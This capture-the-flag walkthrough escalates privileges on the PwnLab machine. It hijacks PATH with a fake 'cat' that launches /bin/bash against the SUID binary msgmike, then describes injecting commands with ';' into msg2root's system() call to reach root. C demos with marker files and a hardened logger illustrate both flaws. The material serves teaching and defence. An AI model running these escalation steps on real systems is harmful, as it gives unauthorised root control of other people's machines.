Table of contents
Environment hijacking of a command invoked without an absolute path
foreword
- SUID privilege escalation
- environment variable hijacking
- command concatenation
Find SUID files
Earlier, the perimeter was breached through port 80, and the information gathered there made it possible to switch to the kane user.
Find files with SUID permissions
find / -perm -u=s -type f 2>/dev/null
or
find / -perm -4000 2>/dev/null
kane@pwnlab:/home$ find / -perm -u=s -type f 2>/dev/null
/bin/mount
/bin/su
/bin/umount
/sbin/mount.nfs
/home/kane/msgmike
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/at
/usr/bin/passwd
/usr/bin/procmail
/usr/bin/chsh
/usr/bin/gpasswd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/pt_chown
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/sbin/exim4
view msgmike
file msgmike
kane@pwnlab:~$ file msgmike
msgmike: setuid, setgid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=d7e0b21f33b2134bd17467c3bb9be37deb88b365, not stripped
It is a 32-bit ELF executable with both the setuid and setgid bits set.
Run it and see; it prints an error:
kane@pwnlab:~$ ./msgmike
cat: /home/mike/msg.txt: No such file or directory
This suggests that the program runs cat /home/mike/msg.txt; msg.txt does not exist, so cat reports an error.
Look at the printable strings in the binary. The output of strings roughly shows which libraries and functions the program imports and which literal strings, including any command lines, it contains.
strings msgmike
kane@pwnlab:~$ strings msgmike
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
setregid
setreuid
system
__libc_start_main
__gmon_start__
GLIBC_2.0
PTRh
QVh[
[^_]
cat /home/mike/msg.txt
;*2$"(
GCC: (Debian 4.9.2-10) 4.9.2
GCC: (Debian 4.8.4-1) 4.8.4
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rel.dyn
.rel.plt
.init
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.jcr
.dynamic
.got
.got.plt
.data
.bss
.comment
crtstuff.c
__JCR_LIST__
deregister_tm_clones
register_tm_clones
__do_global_dtors_aux
completed.6279
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
msgmike.c
__FRAME_END__
__JCR_END__
__init_array_end
_DYNAMIC
__init_array_start
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
__x86.get_pc_thunk.bx
data_start
_edata
_fini
__data_start
system@@GLIBC_2.0
__gmon_start__
__dso_handle
_IO_stdin_used
setreuid@@GLIBC_2.0
__libc_start_main@@GLIBC_2.0
__libc_csu_init
_end
_start
_fp_hw
__bss_start
main
setregid@@GLIBC_2.0
_Jv_RegisterClasses
__TMC_END__
_ITM_registerTMCloneTable
_init
The presence of system together with the string cat /home/mike/msg.txt shows that the program runs cat /home/mike/msg.txt through system(); setreuid and setregid indicate that it first switches its real and effective user and group IDs to those of the file owner (mike), which is what makes the setuid bit useful to us.
However, cat is named without a path. system() runs its argument with /bin/sh -c, and sh looks a bare command name up in the directories listed in PATH, which we control as the caller. So we can hijack cat by placing our own executable named cat in a directory that comes first in PATH.
Environment hijacking of a command invoked without an absolute path
Create a file named cat in the current directory whose content launches a shell, make it executable, put the current directory at the front of PATH, and run msgmike again:
echo /bin/bash > cat
chmod +x cat
export PATH=.:$PATH
./msgmike
sh finds ./cat before /bin/cat; because the file has no ELF header, sh runs it as a script, which executes /bin/bash. Since msgmike called setreuid/setregid, the real and effective IDs are both mike's and the shell keeps them. (Had the binary only changed the effective UID, bash would drop it on start; in that case write /bin/bash -p into the fake cat instead.)
Successfully obtained mike's shell.
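To make the mechanism concrete, here is an added C example (not code from this writeup or from the PwnLab binaries). It reproduces the PATH lookup that /bin/sh performs for a bare command name, plants a fake cat in a scratch directory, puts that directory first in PATH and then triggers a system("cat /home/mike/msg.txt") call just as msgmike does. The fake cat only creates a marker file instead of launching /bin/bash; the function names, the /tmp scratch directory and the presence of /bin/sh are assumptions of the example.

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

/* Resolve a bare command name the way /bin/sh does when system() runs
 * "cat /home/mike/msg.txt": walk PATH left to right and take the first
 * directory holding an executable regular file of that name.
 * Returns 0 and fills out[] on success, -1 if nothing matched.
 * (strtok_r drops empty entries; the writeup uses an explicit ".".) */
int resolve_in_path(const char *cmd, const char *path, char *out, size_t outlen)
{
    char copy[4096];
    if (!cmd || !path || !out || strlen(path) >= sizeof copy)
        return -1;
    strcpy(copy, path);
    char *save = NULL;
    for (char *dir = strtok_r(copy, ":", &save); dir; dir = strtok_r(NULL, ":", &save)) {
        char cand[8192];
        struct stat st;
        snprintf(cand, sizeof cand, "%s/%s", dir, cmd);
        if (stat(cand, &st) == 0 && S_ISREG(st.st_mode) && access(cand, X_OK) == 0) {
            snprintf(out, outlen, "%s", cand);
            return 0;
        }
    }
    return -1;
}

/* Plant an executable shell script called `name` in `dir`: the attacker's fake cat. */
int plant_command(const char *dir, const char *name, const char *body)
{
    char p[8192];
    snprintf(p, sizeof p, "%s/%s", dir, name);
    FILE *f = fopen(p, "w");
    if (!f)
        return -1;
    fprintf(f, "#!/bin/sh\n%s\n", body);
    if (fclose(f) != 0)
        return -1;
    return chmod(p, 0755);
}

/* What msgmike does once it has switched to mike: hand a bare command name to
 * /bin/sh via system(). PATH is inherited from the caller, so the caller
 * decides which "cat" runs. */
int run_like_msgmike(const char *path)
{
    setenv("PATH", path, 1);
    return system("cat /home/mike/msg.txt");
}

/* End to end: create a scratch directory, plant a fake cat that leaves a marker
 * file (a stand-in for the /bin/bash the writeup plants), put the directory first
 * in PATH and trigger the system() call. Returns 1 if the fake cat ran. */
int hijack_demo(void)
{
    char tmpl[] = "/tmp/pathhijack.XXXXXX";   /* assumption: /tmp is writable */
    char *dir = mkdtemp(tmpl);
    if (!dir)
        return -1;
    char marker[256], body[512], path[512], resolved[8192];
    snprintf(marker, sizeof marker, "%s/fake-cat-ran", dir);
    snprintf(body, sizeof body, ": > %s", marker);        /* shell builtins only */
    if (plant_command(dir, "cat", body) != 0)
        return -1;
    snprintf(path, sizeof path, "%s:/usr/bin:/bin", dir);
    if (resolve_in_path("cat", path, resolved, sizeof resolved) != 0)
        return -1;
    if (strncmp(resolved, dir, strlen(dir)) != 0)          /* ours, not /bin/cat */
        return 0;
    run_like_msgmike(path);
    return access(marker, F_OK) == 0 ? 1 : 0;
}

int main(void)
{
    if (hijack_demo() == 1)
        puts("fake cat ran: the bare 'cat' was resolved through our PATH entry");
    else
        puts("hijack did not trigger");
    return 0;
}
```

The writeup's /bin/bash in the fake cat works for the same reason the marker file does: sh resolves the bare name to the planted file. On the defensive side, the binary would need an absolute path and a sanitised environment, or better no shell at all (execve of a fixed path with a fixed argv).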
Then search for SUID files again as mike:
mike@pwnlab:~$ find / -perm -u=s -type f 2>/dev/null
/bin/mount
/bin/su
/bin/umount
/sbin/mount.nfs
/home/mike/msg2root
/home/kane/msgmike
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/at
/usr/bin/passwd
/usr/bin/procmail
/usr/bin/chsh
/usr/bin/gpasswd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/pt_chown
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/sbin/exim4
command concatenation
View /home/mike/msg2root
mike@pwnlab:/home/mike$ file msg2root
msg2root: setuid, setgid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=60bf769f8fbbfd406c047f698b55d2668fae14d3, not stripped
This time the binary is setuid root (the file output only shows the bit; confirm the owner with ls -l msg2root), so exploiting it yields root.
Try running it:
mike@pwnlab:/home/mike$ ./msg2root
Message for root: id
id
mike@pwnlab:/home/mike$
It apparently records a message for root.
Look at the strings:
mike@pwnlab:/home/mike$ strings msg2root
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
stdin
fgets
asprintf
system
__libc_start_main
__gmon_start__
GLIBC_2.0
PTRh
[^_]
Message for root:
/bin/echo %s >> /root/messages.txt
;*2$"(
GCC: (Debian 4.9.2-10) 4.9.2
GCC: (Debian 4.8.4-1) 4.8.4
.symtab
[remainder omitted]
Here echo is invoked by its absolute path /bin/echo, so PATH hijacking does not apply.
But look at the format string /bin/echo %s >> /root/messages.txt together with fgets, asprintf and system: the line we type is read with fgets, substituted for %s with asprintf, and the result is handed to system(), that is, to /bin/sh -c.
We can therefore use command concatenation (the shell analogue of SQL injection): a shell separator such as ; in the message terminates the echo command, and whatever follows it runs with root's effective UID. Note that, unlike msgmike, the strings of msg2root show no setreuid/setregid, so only the effective UID of the resulting shell is root; a bash started from it drops that privilege unless invoked with -p.
Successfully escalated to the root user.
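As an added example (not the page's or msg2root's own code), the following C program builds the same /bin/echo %s >> FILE command line from a message and passes it to system(), next to a hardened version that appends the message with stdio and never invokes a shell. A constructed message containing ; shows that the vulnerable version runs the injected command (it creates a marker file, standing in for a spawned shell) while the hardened version logs the text verbatim. /root/messages.txt is replaced by files in a scratch directory; the function names, the /tmp scratch directory and the presence of /bin/sh and /bin/echo are assumptions of the example.

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* The msg2root pattern: the message is pasted into a shell command line
 * (msg2root does this with asprintf; a sized buffer is used here) and the
 * whole string goes to /bin/sh via system(). Anything sh treats as syntax
 * inside `msg` (; | & $( ) ` > ...) is executed, not logged. */
int vulnerable_log(const char *logfile, const char *msg)
{
    char cmd[4096];
    int n = snprintf(cmd, sizeof cmd, "/bin/echo %s >> %s", msg, logfile);
    if (n < 0 || n >= (int)sizeof cmd)
        return -1;
    return system(cmd);
}

/* Hardened version: no shell at all. The process appends the bytes itself,
 * so metacharacters are just characters in the log line. */
int safe_log(const char *logfile, const char *msg)
{
    FILE *f = fopen(logfile, "a");
    if (!f)
        return -1;
    int ok = fprintf(f, "%s\n", msg) >= 0;
    return (fclose(f) == 0 && ok) ? 0 : -1;
}

/* Does the file at `path` contain `needle` verbatim? Used to inspect the logs. */
int file_contains(const char *path, const char *needle)
{
    FILE *f = fopen(path, "r");
    if (!f)
        return 0;
    char buf[8192];
    size_t n = fread(buf, 1, sizeof buf - 1, f);
    fclose(f);
    buf[n] = '\0';
    return strstr(buf, needle) != NULL;
}

/* Feed one constructed payload to both versions. The payload uses ';' to end
 * the echo command and start a second one that creates a marker file (a
 * stand-in for spawning a shell). Returns 1 when the safe version logged the
 * text verbatim without running anything and the vulnerable version executed
 * the injected command. */
int injection_demo(void)
{
    char tmpl[] = "/tmp/msg2root.XXXXXX";     /* assumption: /tmp is writable */
    char *dir = mkdtemp(tmpl);
    if (!dir)
        return -1;
    char vlog[256], slog[256], marker[256], payload[512];
    snprintf(vlog, sizeof vlog, "%s/vulnerable.txt", dir);
    snprintf(slog, sizeof slog, "%s/safe.txt", dir);
    snprintf(marker, sizeof marker, "%s/injected", dir);
    snprintf(payload, sizeof payload, "hello; : > %s", marker);   /* constructed payload */

    if (safe_log(slog, payload) != 0 || !file_contains(slog, payload))
        return 0;
    if (access(marker, F_OK) == 0)      /* the safe version must not have run anything */
        return 0;
    vulnerable_log(vlog, payload);      /* sh runs: /bin/echo hello; : > marker >> vlog */
    return access(marker, F_OK) == 0 ? 1 : 0;
}

int main(void)
{
    if (injection_demo() == 1)
        puts("vulnerable_log executed the injected command; safe_log only recorded it");
    else
        puts("demo did not behave as expected");
    return 0;
}
```

The point of safe_log is not input filtering but removing the shell from the data path; if an external program really is required, exec it directly with a fixed path and an argv array so the message is never parsed as a command line.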